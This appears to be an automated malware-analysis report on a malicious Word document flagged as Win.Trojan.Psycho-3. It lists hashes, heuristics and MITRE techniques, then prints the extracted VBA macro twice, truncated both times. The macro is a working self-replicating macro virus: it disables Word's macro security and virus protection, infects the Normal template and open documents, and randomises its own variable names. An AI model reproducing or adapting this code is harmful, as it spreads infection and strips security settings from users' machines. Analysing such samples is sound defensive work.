Office (OLE) malware analysis — malicious · e10a1c4feb04cb0f

MALICIOUS

Office (OLE)

40.5 KB Created: 2000-07-08 01:48:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 7a1b8f4d96dfb0e57184683ed04f927d SHA-1: 6927d7d95d7880aa225aed55b8e41086498b0c28 SHA-256: e10a1c4feb04cb0f00df710f8790fd7c30d224542937da75f9eb9211211e2c44

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when a document is opened. The script attempts to disable Word's macro security settings by writing to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level. This indicates an attempt to facilitate further malicious activity, likely the download and execution of a secondary payload, though the full script is truncated.

Heuristics 3

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4876 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4876 bytes
SHA-256: `6ad03e4baf3513cb6877a2f38608738bedad7145a449920a9e457b42abeca600`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next mbophhmbop = 1 mbopl1mbop = "M" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Options.VirusProtection = False Options.SaveNormalPrompt = False mbopfimbop = 1 Options.ConfirmConversions = False Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule mbop11mbop = 1 Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule mbopsembop = 3 Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule mboptrmbop = 3 mbopl2mbop = "b" mbopfnmbop = mbopfimbop & mbopsembop & mboptrmbop For mbopiimbop = 1 To mbopTdmbop.countoflines If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then mbopSlmbop = mbopiimbop Exit For End If Next mbopl3mbop = "o" mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop)) mboplvmbop = 97 mbop15mbop = 15 If mbopNtmbop.countoflines > 0 Then mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines) If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then If InStr(LCase(mbopNlmbop), "private sub document_open()") <> 0 Then For mbopimbop = 1 To mbopNtmbop.countoflines If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next For mbopimbop = mbopnsmbop To mbopNtmbop.countoflines If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then mbopnembop = mbopimbop Exit For End If Next mbopNtmbop.deletelines mbopnsmbop, mbopnembop End If If InStr(LCase(mbopNlmbop), "option explicit") <> 0 Then For mbopimbop = 1 To mbopNtmbop.countoflines If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next mbopNtmbop.deletelines mbopnsmbop, 1 End If mbopNtmbop.addfromstring mbopVcmbop mbopNtmbop.Save mbopinmbop = mbophhmbop End If Else mbopNtmbop.addfromstring mbopVcmbop mbopNtmbop.Save mbopinmbop = mbophhmbop End If mbophvmbop = 122 mbopimbop = 1 mbopdqmbop = Documents.Count If mbopAdmbop.countoflines > 0 Then mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines) If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then If InStr(LCase(mbopAlmbop), "private sub document_open()") <> 0 Then For mbopimbop = 1 To mbopAdmbop.countoflines If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next For mbopimbop = mbopnsmbop To mbopAdmbop.countoflines If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then mbopnembop = mbopimbop Exit For End If Next mbopAdmbop.deletelines mbopnsmbop, mbopnembop End If If InStr(LCase(mbopAlmbop), "option explicit") <> 0 Then For mbopimbop = 1 To mbopAdmbop.countoflines If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next mbopAdmbop.deletelines mbopnsmbop, 1 End If mbopAdmbop.addfromstring mbopVcmbop mbopiambop = mbophhmbop End If Else mbopAdmbop.addfromstring mbopVcmbop mbopiambop = mbophhmbop End If mbopl4mbop = "p" Randomize mbop15mbop = Int((mbop15mbop - mbop11mbop + mbop11mbop) * Rnd + mbop11mbop) For mbopiimbop = 1 To mbop15mbop Randomize mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop)) Next mbopd2mbop = 9 mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines) mbopTdmbop.deletelines 1, mbopTdmbop.cou ... (truncated)

SHA-256: 6ad03e4baf3513cb6877a2f38608738bedad7145a449920a9e457b42abeca600

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
mbophhmbop = 1
mbopl1mbop = "M"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = False
Options.SaveNormalPrompt = False
mbopfimbop = 1
Options.ConfirmConversions = False
Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
mbop11mbop = 1
Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
mbopsembop = 3
Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
mboptrmbop = 3
mbopl2mbop = "b"
mbopfnmbop = mbopfimbop & mbopsembop & mboptrmbop
For mbopiimbop = 1 To mbopTdmbop.countoflines
If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then
mbopSlmbop = mbopiimbop
Exit For
End If
Next
mbopl3mbop = "o"
mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop))
mboplvmbop = 97
mbop15mbop = 15
If mbopNtmbop.countoflines > 0 Then
mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines)
If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then
If InStr(LCase(mbopNlmbop), "private sub document_open()") <> 0 Then
For mbopimbop = 1 To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
For mbopimbop = mbopnsmbop To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
mbopnembop = mbopimbop
Exit For
End If
Next
mbopNtmbop.deletelines mbopnsmbop, mbopnembop
End If
If InStr(LCase(mbopNlmbop), "option explicit") <> 0 Then
For mbopimbop = 1 To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
mbopNtmbop.deletelines mbopnsmbop, 1
End If
mbopNtmbop.addfromstring mbopVcmbop
mbopNtmbop.Save
mbopinmbop = mbophhmbop
End If
Else
mbopNtmbop.addfromstring mbopVcmbop
mbopNtmbop.Save
mbopinmbop = mbophhmbop
End If
mbophvmbop = 122
mbopimbop = 1
mbopdqmbop = Documents.Count
If mbopAdmbop.countoflines > 0 Then
mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines)
If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then
If InStr(LCase(mbopAlmbop), "private sub document_open()") <> 0 Then
For mbopimbop = 1 To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
For mbopimbop = mbopnsmbop To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
mbopnembop = mbopimbop
Exit For
End If
Next
mbopAdmbop.deletelines mbopnsmbop, mbopnembop
End If
If InStr(LCase(mbopAlmbop), "option explicit") <> 0 Then
For mbopimbop = 1 To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
mbopAdmbop.deletelines mbopnsmbop, 1
End If
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = mbophhmbop
End If
Else
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = mbophhmbop
End If
mbopl4mbop = "p"
Randomize
mbop15mbop = Int((mbop15mbop - mbop11mbop + mbop11mbop) * Rnd + mbop11mbop)
For mbopiimbop = 1 To mbop15mbop
Randomize
mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop))
Next
mbopd2mbop = 9
mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines)
mbopTdmbop.deletelines 1, mbopTdmbop.cou
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.